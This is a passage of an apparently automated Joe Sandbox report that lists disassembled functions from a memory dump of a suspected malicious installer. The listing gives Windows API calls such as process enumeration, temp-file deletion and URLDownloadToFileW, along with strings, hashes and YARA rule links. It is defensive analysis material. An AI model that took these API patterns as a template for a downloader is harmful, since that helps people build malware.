Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset_wcslen$FileOperation
String ID:
API String ID: 1469800647-0
Opcode ID: 55ac6257925e1909cc4467abb62efda831668ffb0405acae67e1f3125b629fdf
Instruction ID: 81b0e57993af96c12a7b08379123b05109c0b24e78354be866519c993506478f
Opcode Fuzzy Hash: 55ac6257925e1909cc4467abb62efda831668ffb0405acae67e1f3125b629fdf
Instruction Fuzzy Hash: 18112E71A1026D9ADF61EFF8DC49BFE73A8BF08700F540429B619E7141EB7496088B15

Function 00ADD3E1 Relevance: 7.6, APIs: 5, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ADD400
Process32FirstW.KERNEL32(00000000,?), ref: 00ADD422
CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 00ADD42C
Process32NextW.KERNEL32(00000000,0000022C), ref: 00ADD447
CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 00ADD45B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1789362936-0
Opcode ID: 80903a45c124e11edacd73d6558fc542eda39dbc36331e7205cfe80d47ee9063
Instruction ID: 2350cfc0d942bbd2b009e30878841cf925870575fc46cb4dee6371a31248174e
Opcode Fuzzy Hash: 80903a45c124e11edacd73d6558fc542eda39dbc36331e7205cfe80d47ee9063
Instruction Fuzzy Hash: FC118471511114EFD720AF75CD89BBE73F8EB55321F50086AE856D7280DB34AE41CB21

Function 00ADE037 Relevance: 7.6, APIs: 5, Instructions: 52fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ADE069
GetTempPathW.KERNEL32(00000104,?,00B5CDA4,?,?), ref: 00ADE07D
_memset.LIBCMT ref: 00ADE08D
GetTempFileNameW.KERNEL32(?,00AA85B6,00000000,?,?,?,?,?,?,?), ref: 00ADE0A6
DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00ADE0B3

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FileTemp_memset$DeleteNamePath
String ID:
API String ID: 433304728-0
Opcode ID: 7ab47a50f8227b9dfe01f7ce51b187ce731639cf506018fd726a311e2f267e0d
Instruction ID: de64a8f8502316cd918df57b70c1725a1d0b112a024466815988c46df6fdfeea
Opcode Fuzzy Hash: 7ab47a50f8227b9dfe01f7ce51b187ce731639cf506018fd726a311e2f267e0d
Instruction Fuzzy Hash: F411C8F6A0021CABCB10DB94EC49FEE73BCEB48305F1040B5B715E3141EA30AB488BA4

Function 00ABEC81 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00ABB670: DeleteObject.GDI32(?), ref: 00ABB68C

GetModuleHandleW.KERNEL32(?), ref: 00ABEC97
FindResourceW.KERNEL32(?,?,?), ref: 00ABECA8
SizeofResource.KERNEL32(?,00000000), ref: 00ABECB7
LoadResource.KERNEL32(?,00000000), ref: 00ABECC1
LockResource.KERNEL32(00000000), ref: 00ABECC8

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Resource$DeleteFindHandleLoadLockModuleObjectSizeof
String ID:
API String ID: 2239502561-0
Opcode ID: ad1ee3caa513b42a4a13c4f177ced15e59cea7f73d5662500d8a4cf221234e7b
Instruction ID: 574fe1c748ec66c8d8c0b5d6f1e051facfa59f4adea7e1c3df8d2215eebce2bd
Opcode Fuzzy Hash: ad1ee3caa513b42a4a13c4f177ced15e59cea7f73d5662500d8a4cf221234e7b
Instruction Fuzzy Hash: BE016D32900214BFDB22DBA69D08DEF7BACEF457517104419F805D7211DA34DD51D6A4

Function 00AF49FC Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00AF4A1A

Part of subcall function 00B0339F: __mtinitlocknum.LIBCMT ref: 00B033B5
Part of subcall function 00B0339F: __amsg_exit.LIBCMT ref: 00B033C1
Part of subcall function 00B0339F: EnterCriticalSection.KERNEL32(?,?,?,00B04EDB,0000000D,00B4EFE8,00000008,00AFEA68,?,00000000), ref: 00B033C9

___sbh_find_block.LIBCMT ref: 00AF4A25
___sbh_free_block.LIBCMT ref: 00AF4A34
RtlFreeHeap.NTDLL(00000000,?,00B4E890,0000000C,00B04E21,00000000,?,00B005A7,?,00000001,?,?,00B03329,00000018,00B4EF60,0000000C), ref: 00AF4A64
GetLastError.KERNEL32(?,00B005A7,?,00000001,?,?,00B03329,00000018,00B4EF60,0000000C,00B033BA,?,?,?,00B04EDB,0000000D), ref: 00AF4A75

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: eb8c8cef69139fcfc5be9994f46d0ec083c348b140c71e985e29a5e4aa5ffa09
Instruction ID: fe910bd0f0a789b942274556edb30e6a945f21e486dba361bc73f9281ec8e738
Opcode Fuzzy Hash: eb8c8cef69139fcfc5be9994f46d0ec083c348b140c71e985e29a5e4aa5ffa09
Instruction Fuzzy Hash: AF016271D41309AADB30BBF19D0AB7F3FE8AF057A1F104559F614A70D1DF3486408A99

Function 00A8BCDE Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

parent=, xrefs: 00A8BE6D

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3$_memset
String ID: parent=
API String ID: 1193784468-1815376381
Opcode ID: 62dbecfed19a5feed211a38a014b555743b4631a9336f1aad24348f00459eff4
Instruction ID: 2bf9efcc16a88ce7b8ac140456db97e347cda7f1f1dfc8dc8014231b46db5281
Opcode Fuzzy Hash: 62dbecfed19a5feed211a38a014b555743b4631a9336f1aad24348f00459eff4
Instruction Fuzzy Hash: 81619231A142059ADB24BBB4EE53ABD77B5AF40710F20411EF5166B2D2EF609845CB25

Function 00AC5F4D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00AC5F54

Strings

A:\, xrefs: 00AC6049

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3_
String ID: A:\
API String ID: 2427045233-3379428675
Opcode ID: d4246ac553319d82ba6da70ba6768c2bc2ace31f576e420a9d224fc6ecf90af6
Instruction ID: a274bc27851accbcf7c420fb524e56a50faea6e7db71506bf99b478d0538f74e
Opcode Fuzzy Hash: d4246ac553319d82ba6da70ba6768c2bc2ace31f576e420a9d224fc6ecf90af6
Instruction Fuzzy Hash: 6A41D138A00512DADF3DEB28894AFBD77E1EF50301F56802DF582AB195DB20ADC2C781

Function 00AD0215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00AD021C
GetDriveTypeW.KERNEL32(?,?,?,?,0000002C), ref: 00AD032D
PathFileExistsW.SHLWAPI(?,0000002C), ref: 00AD034A

Strings

A:\, xrefs: 00AD0306

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: DriveExistsFileH_prolog3_PathType
String ID: A:\
API String ID: 2710305776-3379428675
Opcode ID: a36b294e7ecdc55457eb50cce64d4f40aa3b714e188c2e509fc90d4c08fc55f7
Instruction ID: c44a0a8b28cdaad30b6d10a650468aa41f55794aacf34769e36a6b34aca4ba6f
Opcode Fuzzy Hash: a36b294e7ecdc55457eb50cce64d4f40aa3b714e188c2e509fc90d4c08fc55f7
Instruction Fuzzy Hash: 8A4194389121118ACF28ABA5C5ADFFE73A1EF52310F94402FE683D7355DB308D82C665

Function 00AE6894 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00AE689E
_memcmp.LIBCMT ref: 00AE694B
_memset.LIBCMT ref: 00AE6964

Strings

[360signdata]sign=, xrefs: 00AE6945

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3__memcmp_memset
String ID: [360signdata]sign=
API String ID: 1379577869-1737267629
Opcode ID: ab119ca464d7f7482107520105a23d2930204b47b97ad4ef7b72dca0d867056d
Instruction ID: 56a4c5ddb8197b80acb2d71cd39375e96eafa6c1bd8e98448cf9185743541bfd
Opcode Fuzzy Hash: ab119ca464d7f7482107520105a23d2930204b47b97ad4ef7b72dca0d867056d
Instruction Fuzzy Hash: 4E419271D046589BCB20EF62CD41BEE73B8BF24395F6409E9E509A3181E774AE848F50

Function 00AA8544 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AA854B

Part of subcall function 00AF5546: _malloc.LIBCMT ref: 00AF5560

Part of subcall function 00A8A8EB: _wcsnlen.LIBCMT ref: 00A8A91D

Part of subcall function 00ADE037: _memset.LIBCMT ref: 00ADE069
Part of subcall function 00ADE037: GetTempPathW.KERNEL32(00000104,?,00B5CDA4,?,?), ref: 00ADE07D
Part of subcall function 00ADE037: _memset.LIBCMT ref: 00ADE08D
Part of subcall function 00ADE037: GetTempFileNameW.KERNEL32(?,00AA85B6,00000000,?,?,?,?,?,?,?), ref: 00ADE0A6
Part of subcall function 00ADE037: DeleteFileW.KERNEL32(?,?,?,?,?,?,?), ref: 00ADE0B3

GetTickCount.KERNEL32 ref: 00AA85F7

Strings

?rd=%d, xrefs: 00AA858B
!@tmpini%^&, xrefs: 00AA85AB

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FileTemp_memset$CountDeleteH_prolog3NamePathTick_malloc_wcsnlen
String ID: !@tmpini%^&$?rd=%d
API String ID: 431327915-4013382025
Opcode ID: 592a7589c853493290e41feaef33b60666b0a3069dab7cc40e74f91fdb39a4bb
Instruction ID: c0982b8ead1b3679f9cac68c6926d7e207fafb5b3911d71fdc15e7cb2fdd8539
Opcode Fuzzy Hash: 592a7589c853493290e41feaef33b60666b0a3069dab7cc40e74f91fdb39a4bb
Instruction Fuzzy Hash: BE219A72A002099BDB25F7B4CE42BFEB3B9AF44321F544459F21AA72C2CF7469048725

Function 00AB30A3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AB30AA
SetWindowPos.USER32(?,00000000,00000000,00000000,0000019F,00000078,00000006,0000012A,PNG,00000018), ref: 00AB30E5

Part of subcall function 00A9E185: GetDC.USER32(?), ref: 00A9E193

Part of subcall function 00AF5546: _malloc.LIBCMT ref: 00AF5560

Part of subcall function 00AA7323: CreateCompatibleDC.GDI32(?), ref: 00AA7347
Part of subcall function 00AA7323: SelectObject.GDI32(?,?), ref: 00AA736E
Part of subcall function 00AA7323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00AA7387

Strings

PNG, xrefs: 00AB30B1
x, xrefs: 00AB3104

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CompatibleCreateH_prolog3ObjectSelectViewportWindow_malloc
String ID: PNG$x
API String ID: 2666613662-1595511861
Opcode ID: db39466c4ea878768511703d909ad4be959cff7531c985f06a976587dc23f370
Instruction ID: b47148b93c2b832d1a0889b004b2fbc20c91fd6a67dccc1b53233a847fd37ae2
Opcode Fuzzy Hash: db39466c4ea878768511703d909ad4be959cff7531c985f06a976587dc23f370
Instruction Fuzzy Hash: 1911B230A002089FDF14DFA4CE86AFEB6F9AF04710F50416DF106AB2D2DB755E019B11

Function 00A750A0 Relevance: 6.2, APIs: 4, Instructions: 191fileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00A7611A,?,00000000,?), ref: 00A750BC
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00A7611A,?,00000000,?), ref: 00A7515B
ReadFile.KERNEL32(?,?,00008000,?,00000000,?,?,?,?,?,00A7611A,?,00000000,?), ref: 00A75177
_memset.LIBCMT ref: 00A7521E

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File$PointerReadSize_memset
String ID:
API String ID: 1834740430-0
Opcode ID: 6149ebcb1e2e7cd525fcb91d0630c50d41b6075e1b43a05099c53adc0572d7b3
Instruction ID: 9d25fba85f45c297186305b4580f21f4dd104c8fddc3035de9b15097b14f7ab3
Opcode Fuzzy Hash: 6149ebcb1e2e7cd525fcb91d0630c50d41b6075e1b43a05099c53adc0572d7b3
Instruction Fuzzy Hash: 8751AF71A087019BD714DF29DC80B6BB7E4FB88750F94CA2CF88DD7241E674E9458B92

Function 00A94994 Relevance: 6.2, APIs: 4, Instructions: 158filethreadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A9499B
GetCurrentThreadId.KERNEL32 ref: 00A949A2
__wcsicoll.LIBCMT ref: 00A94A21
DeleteFileW.KERNEL32(?), ref: 00A94B63

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CurrentDeleteFileH_prolog3Thread__wcsicoll
String ID:
API String ID: 3249433508-0
Opcode ID: 6842a85f55db5f85c2fecdd42245f01391aed496780544cc64026afa034bf0be
Instruction ID: 514545b5aa8363881914c96721db53d45429037618c3044f9b5d65bf72c32fa9
Opcode Fuzzy Hash: 6842a85f55db5f85c2fecdd42245f01391aed496780544cc64026afa034bf0be
Instruction Fuzzy Hash: F2517B31910209DBDF19FFA0C982AEEBBF1FF18311F10042DF946A6192DB709946DB91

Function 00ADE697 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ADE69E
PathFileExistsW.SHLWAPI(00000000,00000000,00B3E544,0000005C,00000008,00ADE838,?,?,0000002C), ref: 00ADE75E
SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000,?,?,0000002C), ref: 00ADE76B
GetLastError.KERNEL32(?,?,0000002C), ref: 00ADE7B5

Part of subcall function 00A7DFB0: __CxxThrowException@8.LIBCMT ref: 00A7DFC2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CreateDirectoryErrorException@8ExistsFileH_prolog3LastPathThrow
String ID:
API String ID: 3549841302-0
Opcode ID: b1f73e590d266820c9ffbffb2a6bc855df9c465d59573d3e314e2a22737a00ec
Instruction ID: 767aedc2810794adfc8614a6bb2c6379c3949d51c611d094aca8ab02e501dfd9
Opcode Fuzzy Hash: b1f73e590d266820c9ffbffb2a6bc855df9c465d59573d3e314e2a22737a00ec
Instruction Fuzzy Hash: B231D0305011159ACB68FB64CA99AFE77B1EF21301F50852AF51BEF395DB309941CB51

Function 00ADA606 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 00ADA689
SelectObject.GDI32(00000000,?), ref: 00ADA69E
SelectObject.GDI32(00000000,00000000), ref: 00ADA6CA
DeleteDC.GDI32(00000000), ref: 00ADA6DF

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateDelete
String ID:
API String ID: 488333989-0
Opcode ID: 9df74d6df8c38684cc40692aa2d2dae8840134099c1a15788959b05642c4d1e8
Instruction ID: af07f88bcbcfb763071eab3301458931b60468f1125d0c332310ec1323c3de95
Opcode Fuzzy Hash: 9df74d6df8c38684cc40692aa2d2dae8840134099c1a15788959b05642c4d1e8
Instruction Fuzzy Hash: 2731E37690010AEFCF11DFA4CD41DEE7BBAEF58304F00411AF916A2261DB31DA66DB91

Function 00A880FC Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A88116
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00A8813D
TranslateMessage.USER32(?), ref: 00A88158
DispatchMessageW.USER32(?), ref: 00A8815F

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
String ID:
API String ID: 1533324876-0
Opcode ID: 8f462308a7242898e83a86f571a9be9f10ab811776b4f667968460429ce61df1
Instruction ID: 7fa67e201ed6bf7f66e34fa8a81ae160d691b43eea3c2c6f1b5ac36a4fe3fae0
Opcode Fuzzy Hash: 8f462308a7242898e83a86f571a9be9f10ab811776b4f667968460429ce61df1
Instruction Fuzzy Hash: 0E01927121560A6F57207FA58CCC9BFB7ACEF563997100629F112C2010FF68CC038BA1

Function 00AB683D Relevance: 6.1, APIs: 4, Instructions: 59filenetworkCOMMON

Download Yara Rule

APIs

URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00AB6871
_memset.LIBCMT ref: 00AB68A0
URLDownloadToCacheFileW.URLMON(00000000,?,?,00000104,00000000,00000000), ref: 00AB68B8
